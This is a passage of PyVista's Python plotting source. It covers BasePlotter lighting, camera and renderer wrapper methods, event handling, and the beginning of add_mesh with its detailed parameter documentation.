if only_active else self.renderers for renderer in renderers: renderer.remove_all_lights() # Inspired from Mayavi's version of Raymond Maple 3-lights illumination intensities = [1, 0.6, 0.5] all_angles = [(45.0, 45.0), (-30.0, -60.0), (-30.0, 60.0)] for intensity, angles in zip(intensities, all_angles): light = pyvista.Light(light_type='camera light') light.intensity = intensity light.position = _to_pos(*angles) for renderer in renderers: renderer.add_light(light) def disable_3_lights(self): """Please use ``enable_lightkit``, this method has been depreciated.""" from pyvista.core.errors import DeprecationError raise DeprecationError('DEPRECATED: Please use ``enable_lightkit``') def enable_lightkit(self, only_active=False): """Enable the default light-kit lighting. See: https://www.researchgate.net/publication/2926068 This will replace all pre-existing lights in the renderer. Parameters ---------- only_active : bool If ``True``, only change the active renderer. The default is that every renderer is affected. Examples -------- Create a plotter without any lights and then enable the default light kit. >>> import pyvista >>> pl = pyvista.Plotter(lighting=None) >>> pl.enable_lightkit() >>> actor = pl.add_mesh(pyvista.Cube(), show_edges=True) >>> pl.show() """ renderers = [self.renderer] if only_active else self.renderers light_kit = _vtk.vtkLightKit() for renderer in renderers: renderer.remove_all_lights() # Use the renderer as a vtkLightKit parser. # Feed it the LightKit, pop off the vtkLights, put back # pyvista Lights. This is the price we must pay for using # inheritance rather than composition. light_kit.AddLightsToRenderer(renderer) vtk_lights = renderer.lights renderer.remove_all_lights() for vtk_light in vtk_lights: light = pyvista.Light.from_vtk(vtk_light) renderer.add_light(light) renderer.LightFollowCameraOn() @wraps(Renderer.enable_anti_aliasing) def enable_anti_aliasing(self, *args, **kwargs): """Wrap ``Renderer.enable_anti_aliasing``.""" for renderer in self.renderers: renderer.enable_anti_aliasing(*args, **kwargs) @wraps(Renderer.disable_anti_aliasing) def disable_anti_aliasing(self, *args, **kwargs): """Wrap ``Renderer.disable_anti_aliasing``.""" self.renderer.disable_anti_aliasing(*args, **kwargs) @wraps(Renderer.set_focus) def set_focus(self, *args, render=True, **kwargs): """Wrap ``Renderer.set_focus``.""" log.debug('set_focus: %s, %s', str(args), str(kwargs)) self.renderer.set_focus(*args, **kwargs) if render: self.render() @wraps(Renderer.set_position) def set_position(self, *args, render=True, **kwargs): """Wrap ``Renderer.set_position``.""" self.renderer.set_position(*args, **kwargs) if render: self.render() @wraps(Renderer.set_viewup) def set_viewup(self, *args, render=True, **kwargs): """Wrap ``Renderer.set_viewup``.""" self.renderer.set_viewup(*args, **kwargs) if render: self.render() @wraps(Renderer.add_orientation_widget) def add_orientation_widget(self, *args, **kwargs): """Wrap ``Renderer.add_orientation_widget``.""" return self.renderer.add_orientation_widget(*args, **kwargs) @wraps(Renderer.add_axes) def add_axes(self, *args, **kwargs): """Wrap ``Renderer.add_axes``.""" return self.renderer.add_axes(*args, **kwargs) @wraps(Renderer.hide_axes) def hide_axes(self, *args, **kwargs): """Wrap ``Renderer.hide_axes``.""" return self.renderer.hide_axes(*args, **kwargs) @wraps(Renderer.show_axes) def show_axes(self, *args, **kwargs): """Wrap ``Renderer.show_axes``.""" return self.renderer.show_axes(*args, **kwargs) @wraps(Renderer.update_bounds_axes) def update_bounds_axes(self, *args, **kwargs): """Wrap ``Renderer.update_bounds_axes``.""" return self.renderer.update_bounds_axes(*args, **kwargs) @wraps(Renderer.add_chart) def add_chart(self, *args, **kwargs): """Wrap ``Renderer.add_chart``.""" return self.renderer.add_chart(*args, **kwargs) @wraps(Renderer.remove_chart) def remove_chart(self, *args, **kwargs): """Wrap ``Renderer.remove_chart``.""" return self.renderer.remove_chart(*args, **kwargs) @wraps(Renderer.add_actor) def add_actor(self, *args, **kwargs): """Wrap ``Renderer.add_actor``.""" return self.renderer.add_actor(*args, **kwargs) @wraps(Renderer.enable_parallel_projection) def enable_parallel_projection(self, *args, **kwargs): """Wrap ``Renderer.enable_parallel_projection``.""" return self.renderer.enable_parallel_projection(*args, **kwargs) @wraps(Renderer.disable_parallel_projection) def disable_parallel_projection(self, *args, **kwargs): """Wrap ``Renderer.disable_parallel_projection``.""" return self.renderer.disable_parallel_projection(*args, **kwargs) @wraps(Renderer.enable_shadows) def enable_shadows(self, *args, **kwargs): """Wrap ``Renderer.enable_shadows``.""" return self.renderer.enable_shadows(*args, **kwargs) @wraps(Renderer.disable_shadows) def disable_shadows(self, *args, **kwargs): """Wrap ``Renderer.disable_shadows``.""" return self.renderer.disable_shadows(*args, **kwargs) @property def parallel_projection(self): """Return parallel projection state of active render window.""" return self.renderer.parallel_projection @parallel_projection.setter def parallel_projection(self, state): """Set parallel projection state of all active render windows.""" self.renderer.parallel_projection = state @property def parallel_scale(self): """Return parallel scale of active render window.""" return self.renderer.parallel_scale @parallel_scale.setter def parallel_scale(self, value): """Set parallel scale of all active render windows.""" self.renderer.parallel_scale = value @wraps(Renderer.add_axes_at_origin) def add_axes_at_origin(self, *args, **kwargs): """Wrap ``Renderer.add_axes_at_origin``.""" return self.renderer.add_axes_at_origin(*args, **kwargs) @wraps(Renderer.show_bounds) def show_bounds(self, *args, **kwargs): """Wrap ``Renderer.show_bounds``.""" return self.renderer.show_bounds(*args, **kwargs) @wraps(Renderer.add_bounding_box) def add_bounding_box(self, *args, **kwargs): """Wrap ``Renderer.add_bounding_box``.""" return self.renderer.add_bounding_box(*args, **kwargs) @wraps(Renderer.remove_bounding_box) def remove_bounding_box(self, *args, **kwargs): """Wrap ``Renderer.remove_bounding_box``.""" return self.renderer.remove_bounding_box(*args, **kwargs) @wraps(Renderer.remove_bounds_axes) def remove_bounds_axes(self, *args, **kwargs): """Wrap ``Renderer.remove_bounds_axes``.""" return self.renderer.remove_bounds_axes(*args, **kwargs) @wraps(Renderer.show_grid) def show_grid(self, *args, **kwargs): """Wrap ``Renderer.show_grid``.""" return self.renderer.show_grid(*args, **kwargs) @wraps(Renderer.set_scale) def set_scale(self, *args, **kwargs): """Wrap ``Renderer.set_scale``.""" return self.renderer.set_scale(*args, **kwargs) @wraps(Renderer.enable_eye_dome_lighting) def enable_eye_dome_lighting(self, *args, **kwargs): """Wrap ``Renderer.enable_eye_dome_lighting``.""" return self.renderer.enable_eye_dome_lighting(*args, **kwargs) @wraps(Renderer.disable_eye_dome_lighting) def disable_eye_dome_lighting(self, *args, **kwargs): """Wrap ``Renderer.disable_eye_dome_lighting``.""" self.renderer.disable_eye_dome_lighting(*args, **kwargs) @wraps(Renderer.reset_camera) def reset_camera(self, *args, **kwargs): """Wrap ``Renderer.reset_camera``.""" self.renderer.reset_camera(*args, **kwargs) self.render() @wraps(Renderer.isometric_view) def isometric_view(self, *args, **kwargs): """Wrap ``Renderer.isometric_view``.""" self.renderer.isometric_view(*args, **kwargs) @wraps(Renderer.view_isometric) def view_isometric(self, *args, **kwarg): """Wrap ``Renderer.view_isometric``.""" self.renderer.view_isometric(*args, **kwarg) @wraps(Renderer.view_vector) def view_vector(self, *args, **kwarg): """Wrap ``Renderer.view_vector``.""" self.renderer.view_vector(*args, **kwarg) @wraps(Renderer.view_xy) def view_xy(self, *args, **kwarg): """Wrap ``Renderer.view_xy``.""" self.renderer.view_xy(*args, **kwarg) @wraps(Renderer.view_yx) def view_yx(self, *args, **kwarg): """Wrap ``Renderer.view_yx``.""" self.renderer.view_yx(*args, **kwarg) @wraps(Renderer.view_xz) def view_xz(self, *args, **kwarg): """Wrap ``Renderer.view_xz``.""" self.renderer.view_xz(*args, **kwarg) @wraps(Renderer.view_zx) def view_zx(self, *args, **kwarg): """Wrap ``Renderer.view_zx``.""" self.renderer.view_zx(*args, **kwarg) @wraps(Renderer.view_yz) def view_yz(self, *args, **kwarg): """Wrap ``Renderer.view_yz``.""" self.renderer.view_yz(*args, **kwarg) @wraps(Renderer.view_zy) def view_zy(self, *args, **kwarg): """Wrap ``Renderer.view_zy``.""" self.renderer.view_zy(*args, **kwarg) @wraps(Renderer.disable) def disable(self, *args, **kwarg): """Wrap ``Renderer.disable``.""" self.renderer.disable(*args, **kwarg) @wraps(Renderer.enable) def enable(self, *args, **kwarg): """Wrap ``Renderer.enable``.""" self.renderer.enable(*args, **kwarg) @wraps(Renderer.enable_depth_peeling) def enable_depth_peeling(self, *args, **kwargs): """Wrap ``Renderer.enable_depth_peeling``.""" if hasattr(self, 'ren_win'): result = self.renderer.enable_depth_peeling(*args, **kwargs) if result: self.ren_win.AlphaBitPlanesOn() return result @wraps(Renderer.disable_depth_peeling) def disable_depth_peeling(self): """Wrap ``Renderer.disable_depth_peeling``.""" if hasattr(self, 'ren_win'): self.ren_win.AlphaBitPlanesOff() return self.renderer.disable_depth_peeling() @wraps(Renderer.get_default_cam_pos) def get_default_cam_pos(self, *args, **kwargs): """Wrap ``Renderer.get_default_cam_pos``.""" return self.renderer.get_default_cam_pos(*args, **kwargs) @wraps(Renderer.remove_actor) def remove_actor(self, *args, **kwargs): """Wrap ``Renderer.remove_actor``.""" for renderer in self.renderers: renderer.remove_actor(*args, **kwargs) return True @wraps(Renderer.set_environment_texture) def set_environment_texture(self, *args, **kwargs): """Wrap ``Renderer.set_environment_texture``.""" return self.renderer.set_environment_texture(*args, **kwargs) #### Properties from Renderer #### @property def camera(self): """Return the active camera of the active renderer.""" if not self.camera_set: self.camera_position = self.get_default_cam_pos() self.reset_camera() self.camera_set = True return self.renderer.camera @camera.setter def camera(self, camera): """Set the active camera for the rendering scene.""" self.renderer.camera = camera @property def camera_set(self): """Return if the camera of the active renderer has been set.""" return self.renderer.camera_set @camera_set.setter def camera_set(self, is_set): """Set if the camera has been set on the active renderer.""" self.renderer.camera_set = is_set @property def bounds(self): """Return the bounds of the active renderer.""" return self.renderer.bounds @property def length(self): """Return the length of the diagonal of the bounding box of the scene.""" return self.renderer.length @property def center(self): """Return the center of the active renderer.""" return self.renderer.center @property def _scalar_bar_slots(self): """Return the scalar bar slots of the active renderer.""" return self.renderer._scalar_bar_slots @_scalar_bar_slots.setter def _scalar_bar_slots(self, value): """Set the scalar bar slots of the active renderer.""" self.renderer._scalar_bar_slots = value @property def _scalar_bar_slot_lookup(self): """Return the scalar bar slot lookup of the active renderer.""" return self.renderer._scalar_bar_slot_lookup @_scalar_bar_slot_lookup.setter def _scalar_bar_slot_lookup(self, value): """Set the scalar bar slot lookup of the active renderer.""" self.renderer._scalar_bar_slot_lookup = value @property def scale(self): """Return the scaling of the active renderer.""" return self.renderer.scale @scale.setter def scale(self, scale): """Set the scaling of the active renderer.""" self.renderer.set_scale(*scale) @property def camera_position(self): """Return camera position of the active render window.""" return self.renderer.camera_position @camera_position.setter def camera_position(self, camera_location): """Set camera position of the active render window.""" self.renderer.camera_position = camera_location @property def background_color(self): """Return the background color of the active render window.""" return self.renderers.active_renderer.background_color @background_color.setter def background_color(self, color): """Set the background color of all the render windows.""" self.set_background(color) @property def window_size(self): """Return the render window size in ``(width, height)``. Examples -------- Change the window size from ``200 x 200`` to ``400 x 400``. >>> import pyvista >>> pl = pyvista.Plotter(window_size=[200, 200]) >>> pl.window_size [200, 200] >>> pl.window_size = [400, 400] >>> pl.window_size [400, 400] """ return list(self.ren_win.GetSize()) @window_size.setter def window_size(self, window_size): """Set the render window size.""" self.ren_win.SetSize(window_size[0], window_size[1]) @property def image_depth(self): """Return a depth image representing current render window. Helper attribute for ``get_image_depth``. """ return self.get_image_depth() def _check_rendered(self): """Check if the render window has been shown and raise an exception if not.""" if not self._rendered: raise AttributeError( '\nThis plotter has not yet been set up and rendered ' 'with ``show()``.\n' 'Consider setting ``off_screen=True`` ' 'for off screen rendering.\n' ) def _check_has_ren_win(self): """Check if render window attribute exists and raise an exception if not.""" if not hasattr(self, 'ren_win'): raise AttributeError( '\n\nTo retrieve an image after the render window ' 'has been closed, set:\n\n' ' ``plotter.store_image = True``\n\n' 'before closing the plotter.' ) @property def image(self): """Return an image array of current render window. To retrieve an image after the render window has been closed, set: ``plotter.store_image = True`` before closing the plotter. """ if not hasattr(self, 'ren_win') and self.last_image is not None: return self.last_image self._check_rendered() self._check_has_ren_win() data = image_from_window(self.ren_win) if self.image_transparent_background: return data # ignore alpha channel return data[:, :, :-1] def render(self): """Render the main window. Does nothing until ``show`` has been called. """ if hasattr(self, 'ren_win') and not self._first_time: log.debug('Rendering') self.ren_win.Render() self._rendered = True @wraps(RenderWindowInteractor.add_key_event) def add_key_event(self, *args, **kwargs): """Wrap RenderWindowInteractor.add_key_event.""" if hasattr(self, 'iren'): self.iren.add_key_event(*args, **kwargs) def clear_events_for_key(self, key): """Remove the callbacks associated to the key. Parameters ---------- key : str Key to clear events for. """ self.iren.clear_events_for_key(key) def store_mouse_position(self, *args): """Store mouse position.""" if not hasattr(self, "iren"): raise AttributeError("This plotting window is not interactive.") self.mouse_position = self.iren.get_event_position() def store_click_position(self, *args): """Store click position in viewport coordinates.""" if not hasattr(self, "iren"): raise AttributeError("This plotting window is not interactive.") self.click_position = self.iren.get_event_position() self.mouse_position = self.click_position def track_mouse_position(self): """Keep track of the mouse position. This will potentially slow down the interactor. No callbacks supported here - use :func:`pyvista.BasePlotter.track_click_position` instead. """ self.iren.track_mouse_position(self.store_mouse_position) def untrack_mouse_position(self): """Stop tracking the mouse position.""" self.iren.untrack_mouse_position() @wraps(RenderWindowInteractor.track_click_position) def track_click_position(self, *args, **kwargs): """Wrap RenderWindowInteractor.track_click_position.""" self.iren.track_click_position(*args, **kwargs) @wraps(RenderWindowInteractor.untrack_click_position) def untrack_click_position(self, *args, **kwargs): """Stop tracking the click position.""" self.iren.untrack_click_position(*args, **kwargs) @property def pickable_actors(self): """Return or set the pickable actors. When setting, this will be the list of actors to make pickable. All actors not in the list will be made unpickable. If ``actors`` is ``None``, all actors will be made unpickable. Returns ------- list of vtk.vtkActors Examples -------- Add two actors to a :class:`pyvista.Plotter`, make one pickable, and then list the pickable actors. >>> import pyvista as pv >>> pl = pv.Plotter() >>> sphere_actor = pl.add_mesh(pv.Sphere()) >>> cube_actor = pl.add_mesh(pv.Cube(), pickable=False, style='wireframe') >>> len(pl.pickable_actors) 1 Set the pickable actors to both actors. >>> pl.pickable_actors = [sphere_actor, cube_actor] >>> len(pl.pickable_actors) 2 Set the pickable actors to ``None``. >>> pl.pickable_actors = None >>> len(pl.pickable_actors) 0 """ pickable = [] for renderer in self.renderers: for actor in renderer.actors.values(): if actor.GetPickable(): pickable.append(actor) return pickable @pickable_actors.setter def pickable_actors(self, actors=None): """Set the pickable actors.""" actors = [] if actors is None else actors if isinstance(actors, _vtk.vtkActor): actors = [actors] if not all([isinstance(actor, _vtk.vtkActor) for actor in actors]): raise TypeError( f'Expected a vtkActor instance or a list of vtkActors, got ' f'{[type(actor) for actor in actors]} instead.' ) for renderer in self.renderers: for actor in renderer.actors.values(): actor.SetPickable(actor in actors) def _prep_for_close(self): """Make sure a screenshot is acquired before closing. This doesn't actually close anything! It just preps the plotter for closing. """ # Grab screenshot right before renderer closes self.last_image = self.screenshot(True, return_img=True) self.last_image_depth = self.get_image_depth() def increment_point_size_and_line_width(self, increment): """Increment point size and line width of all actors. For every actor in the scene, increment both its point size and line width by the given value. Parameters ---------- increment : float Amount to increment point size and line width. """ for renderer in self.renderers: for actor in renderer._actors.values(): if hasattr(actor, "GetProperty"): prop = actor.GetProperty() if hasattr(prop, "SetPointSize"): prop.SetPointSize(prop.GetPointSize() + increment) if hasattr(prop, "SetLineWidth"): prop.SetLineWidth(prop.GetLineWidth() + increment) self.render() return def reset_key_events(self): """Reset all of the key press events to their defaults.""" if hasattr(self, 'iren'): self.iren.clear_key_event_callbacks() self.add_key_event('q', self._prep_for_close) # Add no matter what b_left_down_callback = lambda: self.iren.add_observer( 'LeftButtonPressEvent', self.left_button_down ) self.add_key_event('b', b_left_down_callback) self.add_key_event('v', lambda: self.isometric_view_interactive()) self.add_key_event('C', lambda: self.enable_cell_picking()) self.add_key_event('Up', lambda: self.camera.Zoom(1.05)) self.add_key_event('Down', lambda: self.camera.Zoom(0.95)) self.add_key_event('plus', lambda: self.increment_point_size_and_line_width(1)) self.add_key_event('minus', lambda: self.increment_point_size_and_line_width(-1)) @wraps(RenderWindowInteractor.key_press_event) def key_press_event(self, *args, **kwargs): """Wrap RenderWindowInteractor.key_press_event.""" self.iren.key_press_event(*args, **kwargs) def left_button_down(self, obj, event_type): """Register the event for a left button down click.""" if hasattr(self.ren_win, 'GetOffScreenFramebuffer'): if not self.ren_win.GetOffScreenFramebuffer().GetFBOIndex(): # must raise a runtime error as this causes a segfault on VTK9 raise ValueError('Invoking helper with no framebuffer') # Get 2D click location on window click_pos = self.iren.get_event_position() # Get corresponding click location in the 3D plot picker = _vtk.vtkWorldPointPicker() picker.Pick(click_pos[0], click_pos[1], 0, self.renderer) self.pickpoint = np.asarray(picker.GetPickPosition()).reshape((-1, 3)) if np.any(np.isnan(self.pickpoint)): self.pickpoint[:] = 0 @wraps(RenderWindowInteractor.enable_trackball_style) def enable_trackball_style(self): """Wrap RenderWindowInteractor.enable_trackball_style.""" self.iren.enable_trackball_style() @wraps(RenderWindowInteractor.enable_trackball_actor_style) def enable_trackball_actor_style(self): """Wrap RenderWindowInteractor.enable_trackball_actor_style.""" self.iren.enable_trackball_actor_style() @wraps(RenderWindowInteractor.enable_image_style) def enable_image_style(self): """Wrap RenderWindowInteractor.enable_image_style.""" self.iren.enable_image_style() @wraps(RenderWindowInteractor.enable_joystick_style) def enable_joystick_style(self): """Wrap RenderWindowInteractor.enable_joystick_style.""" self.iren.enable_joystick_style() @wraps(RenderWindowInteractor.enable_joystick_actor_style) def enable_joystick_actor_style(self): """Wrap RenderWindowInteractor.enable_joystick_actor_style.""" self.iren.enable_joystick_actor_style() @wraps(RenderWindowInteractor.enable_zoom_style) def enable_zoom_style(self): """Wrap RenderWindowInteractor.enable_zoom_style.""" self.iren.enable_zoom_style() @wraps(RenderWindowInteractor.enable_terrain_style) def enable_terrain_style(self, *args, **kwargs): """Wrap RenderWindowInteractor.enable_terrain_style.""" self.iren.enable_terrain_style(*args, **kwargs) @wraps(RenderWindowInteractor.enable_rubber_band_style) def enable_rubber_band_style(self): """Wrap RenderWindowInteractor.enable_rubber_band_style.""" self.iren.enable_rubber_band_style() @wraps(RenderWindowInteractor.enable_rubber_band_2d_style) def enable_rubber_band_2d_style(self): """Wrap RenderWindowInteractor.enable_rubber_band_2d_style.""" self.iren.enable_rubber_band_2d_style() def enable_stereo_render(self): """Enable stereo rendering. Disable this with :func:`disable_stereo_render <BasePlotter.disable_stereo_render>` Examples -------- Enable stereo rendering to show a cube as an anaglyph image. >>> import pyvista as pv >>> pl = pv.Plotter() >>> _ = pl.add_mesh(pv.Cube()) >>> pl.enable_stereo_render() >>> pl.show() """ if hasattr(self, 'ren_win'): self.ren_win.StereoRenderOn() self.ren_win.SetStereoTypeToAnaglyph() def disable_stereo_render(self): """Disable stereo rendering. Enable again with :func:`enable_stereo_render <BasePlotter.enable_stereo_render>` Examples -------- Enable and then disable stereo rendering. It should show a simple cube. >>> import pyvista as pv >>> pl = pv.Plotter() >>> _ = pl.add_mesh(pv.Cube()) >>> pl.enable_stereo_render() >>> pl.disable_stereo_render() >>> pl.show() """ if hasattr(self, 'ren_win'): self.ren_win.StereoRenderOff() def hide_axes_all(self): """Hide the axes orientation widget in all renderers.""" for renderer in self.renderers: renderer.hide_axes() def show_axes_all(self): """Show the axes orientation widget in all renderers.""" for renderer in self.renderers: renderer.show_axes() def isometric_view_interactive(self): """Set the current interactive render window to isometric view.""" interactor = self.iren.get_interactor_style() renderer = interactor.GetCurrentRenderer() if renderer is None: renderer = self.renderer renderer.view_isometric() def update(self, stime=1, force_redraw=True): """Update window, redraw, process messages query. Parameters ---------- stime : int, optional Duration of timer that interrupt vtkRenderWindowInteractor in milliseconds. force_redraw : bool, optional Call ``render`` immediately. """ if stime <= 0: stime = 1 curr_time = time.time() if Plotter.last_update_time > curr_time: Plotter.last_update_time = curr_time if self.iren is not None: update_rate = self.iren.get_desired_update_rate() if (curr_time - Plotter.last_update_time) > (1.0 / update_rate): self.right_timer_id = self.iren.create_repeating_timer(stime) self.render() Plotter.last_update_time = curr_time return if force_redraw: self.render() def add_mesh( self, mesh, color=None, style=None, scalars=None, clim=None, show_edges=None, edge_color=None, point_size=5.0, line_width=None, opacity=1.0, flip_scalars=False, lighting=None, n_colors=256, interpolate_before_map=True, cmap=None, label=None, reset_camera=None, scalar_bar_args=None, show_scalar_bar=None, multi_colors=False, name=None, texture=None, render_points_as_spheres=None, render_lines_as_tubes=False, smooth_shading=None, split_sharp_edges=False, ambient=0.0, diffuse=1.0, specular=0.0, specular_power=100.0, nan_color=None, nan_opacity=1.0, culling=None, rgb=None, categories=False, silhouette=False, use_transparency=False, below_color=None, above_color=None, annotations=None, pickable=True, preference="point", log_scale=False, pbr=False, metallic=0.0, roughness=0.5, render=True, component=None, **kwargs, ): """Add any PyVista/VTK mesh or dataset that PyVista can wrap to the scene. This method is using a mesh representation to view the surfaces and/or geometry of datasets. For volume rendering, see :func:`pyvista.BasePlotter.add_volume`. Parameters ---------- mesh : pyvista.DataSet or pyvista.MultiBlock Any PyVista or VTK mesh is supported. Also, any dataset that :func:`pyvista.wrap` can handle including NumPy arrays of XYZ points. color : color_like, optional, defaults to white Use to make the entire mesh have a single solid color. Either a string, RGB list, or hex color string. For example: ``color='white'``, ``color='w'``, ``color=[1.0, 1.0, 1.0]``, or ``color='#FFFFFF'``. Color will be overridden if scalars are specified. style : str, optional Visualization style of the mesh. One of the following: ``style='surface'``, ``style='wireframe'``, ``style='points'``. Defaults to ``'surface'``. Note that ``'wireframe'`` only shows a wireframe of the outer geometry. scalars : str or numpy.ndarray, optional Scalars used to "color" the mesh. Accepts a string name of an array that is present on the mesh or an array equal to the number of cells or the number of points in the mesh. Array should be sized as a single vector. If both ``color`` and ``scalars`` are ``None``, then the active scalars are used. clim : 2 item list, optional Color bar range for scalars. Defaults to minimum and maximum of scalars array. Example: ``[-1, 2]``. ``rng`` is also an accepted alias for this. show_edges : bool, optional Shows the edges of a mesh. Does not apply to a wireframe representation. edge_color : color_like, optional, defaults to black The solid color to give the edges when ``show_edges=True``. Either a string, RGB list, or hex color string. point_size : float, optional Point size of any nodes in the dataset plotted. Also applicable when style='points'. Default ``5.0``. line_width : float, optional Thickness of lines. Only valid for wireframe and surface representations. Default None. opacity : float, str, array-like Opacity of the mesh. If a single float value is given, it will be the global opacity of the mesh and uniformly applied everywhere - should be between 0 and 1. A string can also be specified to map the scalars range to a predefined opacity transfer function (options include: ``'linear'``, ``'linear_r'``, ``'geom'``, ``'geom_r'``). A string could also be used to map a scalars array from the mesh to the opacity (must have same number of elements as the ``scalars`` argument). Or you can pass a custom made transfer function that is an array either ``n_colors`` in length or shorter. flip_scalars : bool, optional Flip direction of cmap. Most colormaps allow ``*_r`` suffix to do this as well. lighting : bool, optional Enable or disable view direction lighting. Default ``False``. n_colors : int, optional Number of colors to use when displaying scalars. Defaults to 256. The scalar bar will also have this many colors. interpolate_before_map : bool, optional Enabling makes for a smoother scalars display. Default is ``True``. When ``False``, OpenGL will interpolate the mapped colors which can result is showing colors that are not present in the color map. cmap : str, list, optional Name of the Matplotlib colormap to use when mapping the ``scalars``. See available Matplotlib colormaps. Only applicable for when displaying ``scalars``. Requires Matplotlib to be installed. ``colormap`` is also an accepted alias for this. If ``colorcet`` or ``cmocean`` are installed, their colormaps can be specified by name. You can also specify a list of colors to override an existing colormap with a custom one. For example, to create a three color colormap you might specify ``['green', 'red', 'blue']``. label : str, optional String label to use when adding a legend to the scene with :func:`pyvista.BasePlotter.add_legend`. reset_camera : bool, optional Reset the camera after adding this mesh to the scene. scalar_bar_args : dict, optional Dictionary of keyword arguments to pass when adding the scalar bar to the scene. For options, see :func:`pyvista.BasePlotter.add_scalar_bar`. show_scalar_bar : bool If ``False``, a scalar bar will not be added to the scene. Defaults to ``True``. multi_colors : bool, optional If a ``MultiBlock`` dataset is given this will color each block by a solid color using matplotlib's color cycler. name : str, optional The name for the added mesh/actor so that it can be easily updated. If an actor of this name already exists in the rendering window, it will be replaced by the new actor. texture : vtk.vtkTexture or np.ndarray or bool, optional A texture to apply if the input mesh has texture coordinates. This will not work with MultiBlock datasets. If set to ``True``, the first available texture on the object will be used. If a string name is given, it will pull a texture with that name associated to the input mesh. render_points_as_spheres : bool, optional Render points as spheres rather than dots. render_lines_as_tubes : bool, optional Show lines as thick tubes rather than flat lines. Control the width with ``line_width``. smooth_shading : bool, optional Enable smooth shading when ``True`` using either the Gouraud or Phong shading algorithm. When ``False``, use flat shading. Automatically enabled when ``pbr=True``. See :ref:`shading_example`. split_sharp_edges : bool, optional Split sharp edges exceeding 30 degrees when plotting with smooth shading. Control the angle with the optional keyword argument ``feature_angle``. By default this is ``False``. Note that enabling this will create a copy of the input mesh within the plotter. See :ref:`shading_example`. ambient : float, optional When lighting is enabled, this is the amount of light in the range of 0 to 1 (default 0.0) that reaches the actor when not directed at the light source emitted from the viewer. diffuse : float, optional The diffuse lighting coefficient. Default 1.0. specular : float, optional The specular lighting coefficient. Default 0.0. specular_power : float, optional The specular power. Between 0.0 and 128.0. nan_color : color_like, optional, defaults to gray The color to use for all ``NaN`` values in the plotted scalar array. nan_opacity : float, optional Opacity of ``NaN`` values. Should be between 0 and 1. Default 1.0. culling : str, optional Does not render faces that are culled. Options are ``'front'`` or ``'back'``. This can be helpful for dense surface meshes, especially when edges are visible, but can cause flat meshes to be partially displayed. Defaults to ``False``. rgb : bool, optional If an 2 dimensional array is passed as the scalars, plot those values as RGB(A) colors. ``rgba`` is also an accepted alias for this. Opacity (the A) is optional. If a scalars array ending with ``"_rgba"`` is passed, the default becomes ``True``. This can be overridden by setting this parameter to ``False``. categories : bool, optional If set to ``True``, then the number of unique values in the scalar array will be used as the ``n_colors`` argument. silhouette : dict, bool, optional If set to ``True``, plot a silhouette highlight for the mesh. This feature is only available for a triangulated ``PolyData``. As a ``dict``, it contains the properties of the silhouette to display: * ``color``: ``color_like``, color of the silhouette * ``line_width``: ``float``, edge width * ``opacity``: ``float`` between 0 and 1, edge transparency * ``feature_angle``: If a ``float``, display sharp edges exceeding that angle in degrees. * ``decimate``: ``float`` between 0 and 1, level of decimation use_transparency : bool, optional Invert the opacity mappings and make the values correspond to transparency. below_color : color_like, optional Solid color for values below the scalars range (``clim``). This will automatically set the scalar bar ``below_label`` to ``'Below'``. above_color : color_like, optional Solid color for values below the scalars range (``clim``). This will automatically set the scalar bar ``above_label`` to ``'Above'``. annotations : dict, optional Pass a dictionary of annotations. Keys are the float values in the scalars range to annotate on the scalar bar and the values are the the string annotations. pickable : bool, optional Set whether this actor is pickable. preference : str, optional When ``mesh.n_points == mesh.n_cells`` and setting scalars, this parameter sets how the scalars will be mapped to the mesh. Default ``'points'``, causes the scalars will be associated with the mesh points. Can be either ``'points'`` or ``'cells'``. log_scale : bool, optional Use log scale when mapping data to colors. Scalars less than zero are mapped to the smallest representable positive float. Default: ``True``. pbr : bool, optional Enable physics based rendering (PBR) if the mesh is ``PolyData``. Use the ``color`` argument to set the base color. This is only available in VTK>=9. metallic : float, optional Usually this value is either 0 or 1 for a real material but any value in between is valid. This parameter is only used by PBR interpolation. Default value is 0.0. roughness : float, optional This value has to be between 0 (glossy) and 1 (rough). A glossy material has reflections and a high specular part. This parameter is only used by PBR interpolation. Default value is 0.5. render : bool, optional Force a render when ``True``. Default ``True``. component : int, optional Set component of vector valued scalars to plot. Must be nonnegative, if supplied. If ``None``, the magnitude of the vector is plotted. **kwargs : dict, optional Optional developer keyword arguments. Returns ------- vtk.vtkActor VTK actor of the mesh. Examples -------- Add a sphere to the plotter and show it with a custom scalar bar title. >>> import pyvista >>> sphere = pyvista.Sphere() >>> sphere['Data'] = sphere.points[:, 2] >>> plotter = pyvista.Plotter() >>> _ = plotter.add_mesh(sphere, ... scalar_bar_args={'title': 'Z Position'}) >>> plotter.show() Plot using RGB on a single cell. Note that since the number of points and the number of cells are identical, we have to pass ``preference='cell'``. >>> import pyvista >>> import numpy as np >>> vertices = np.array([[0, 0, 0], [1, 0, 0], [.5, .667, 0], [0.5, .33, 0.667]]) >>> faces = np.hstack([[3, 0, 1, 2], [3, 0, 3, 2], [3, 0, 1, 3], [3, 1, 2, 3]]) >>> mesh = pyvista.PolyData(vertices, faces) >>> mesh.cell_data['colors'] = [[255, 255, 255], ... [0, 255, 0], ... [0, 0, 255], ... [255, 0, 0]] >>> plotter = pyvista.Plotter() >>> _ = plotter.add_mesh(mesh, scalars='colors', lighting=False, ... rgb=True, preference='cell') >>> plotter.camera_position='xy' >>> plotter.show() Note how this varies from ``preference=='point'``. This is because each point is now being individually colored, versus in ``preference=='point'``, each cell face is individually colored. >>> plotter = pyvista.Plotter() >>> _ = plotter.add_mesh(mesh, scalars='colors', lighting=False, ... rgb=True, preference='point') >>> plotter.camera_position='xy' >>> plotter.show() Plot a plane with a constant color and vary its opacity by point. >>> plane = pyvista.Plane() >>> plane.plot(color='b', opacity=np.linspace(0, 1, plane.n_points), ... show_edges=True) """ self.mapper = make_mapper(_vtk.vtkDataSetMapper) # Convert the VTK data object to a pyvista wrapped object if necessary if not is_pyvista_dataset(mesh): mesh = wrap(mesh) if not is_pyvista_dataset(mesh): raise TypeError( f'Object type ({type(mesh)}) not supported for plotting in PyVista.' ) ##### Parse arguments to be used for all meshes ##### # Avoid mutating input if scalar_bar_args is None: scalar_bar_args = {'n_colors': n_colors} else: scalar_bar_args = scalar_bar_args.copy() if show_edges is None: show_edges = self._theme.show_edges if show_scalar_bar is None: show_scalar_bar = self._theme.show_scalar_bar if lighting is None: lighting = self._theme.lighting if smooth_shading is None: if pbr: smooth_shading = True else: smooth_shading = self._theme.smooth_shading # supported aliases clim = kwargs.pop('rng', clim) cmap = kwargs.pop('colormap', cmap) culling = kwargs.pop("backface_culling", culling) if render_points_as_spheres is None: render_points_as_spheres = self._theme.render_points_as_spheres if name is None: name 